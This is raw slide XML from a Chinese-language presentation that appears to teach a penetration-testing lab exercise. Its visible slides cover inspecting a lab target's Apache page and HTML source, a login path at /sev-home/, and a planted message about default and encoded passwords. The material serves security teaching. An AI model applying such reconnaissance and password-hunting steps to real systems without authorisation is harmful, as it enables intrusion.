            <a:off x="2224371" y="1116656"/>
            <a:ext cx="7743258" cy="5225450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="圆角矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7576C0C-3856-485B-8188-FE63961793C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2524794" y="1348916"/>
            <a:ext cx="2950973" cy="18217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26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12E63E5B-2091-4AD6-A381-D10BFE20129F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224371" y="2277492"/>
            <a:ext cx="2950973" cy="18217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26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC23E5C9-F6FA-43BE-A4D4-274F47E4825F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224370" y="3429000"/>
            <a:ext cx="4133900" cy="1915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737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访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务页面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0255B6A5-3DD2-4C56-B80A-98EA04D7FC36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071194" y="1116656"/>
            <a:ext cx="7902686" cy="33674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图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F94A2736-E6C8-47A1-BC16-3514B8E6CB7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="3617" r="47559"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6834668" y="1685629"/>
            <a:ext cx="4278424" cy="46127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矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A1A0489-B85C-4A2F-A695-0EF68C4BA594}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071194" y="4676170"/>
            <a:ext cx="5545476" cy="1371466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="2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访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>192.168.194.146</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="2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提示通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址登录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302689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C115E377-3C4D-4F7E-9245-A39EF1ED734F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-421178" y="1530"/>
            <a:ext cx="9559636" cy="92303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图片包含 户外, 标牌, 黑色&#10;&#10;自动生成的说明">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5E0975D-D18B-427E-BA71-3A296F0612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616" y="193626"/>
            <a:ext cx="538838" cy="538838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F74C0E9D-D3D0-4C3B-A9C9-AEF03B433608}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963591" y="193626"/>
            <a:ext cx="7081677" cy="598488"/>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800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>信息收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>解析网页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>源码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D66A7F3-85D5-4D6A-A8B0-CEFF36672EA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="670761" y="1063620"/>
            <a:ext cx="6874510" cy="2855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A4AE86D1-525D-4128-915D-804A3719295A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect r="1532" b="35039"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5167423" y="2986083"/>
            <a:ext cx="6726865" cy="35068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矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458784B4-CFD0-4074-A347-CC136669128C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="497035" y="4051326"/>
            <a:ext cx="4404574" cy="2133213"/>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C000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Boris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，一定要更新你的默认密码。我的线人说军情六处可能正计划渗透进来。注意任何可疑的网络流量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>......</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>我在下面给你密码的编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Natalya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>说她可以破解你的密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12603383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8adfe6c4-9bd1-4f96-a0fa-1594388cca96"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiNzI5NjVlZDY0N2FhYzc0YWUxOGMzMDUzYTBlZDRiNW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33,&quot;width&quot;:11072}"/>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1319</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>211</Paragraphs>
  <Slides>38</Slides>
  <Notes>33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Courier New</vt:lpstr>
      <vt:lpstr>等线 Light</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>华光小标宋_CNKI</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office 主题​​</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Steven Yang</dc:creator>
  <cp:lastModifiedBy>CSD SJTU</cp:lastModifiedBy>
  <cp:revision>76</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-27T08:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-19T15:36:10Z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F4FF5D5A792840E2A048403F7E2FBACE_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.14036</vt:lpwstr>
  </property>
</Properties>
</file>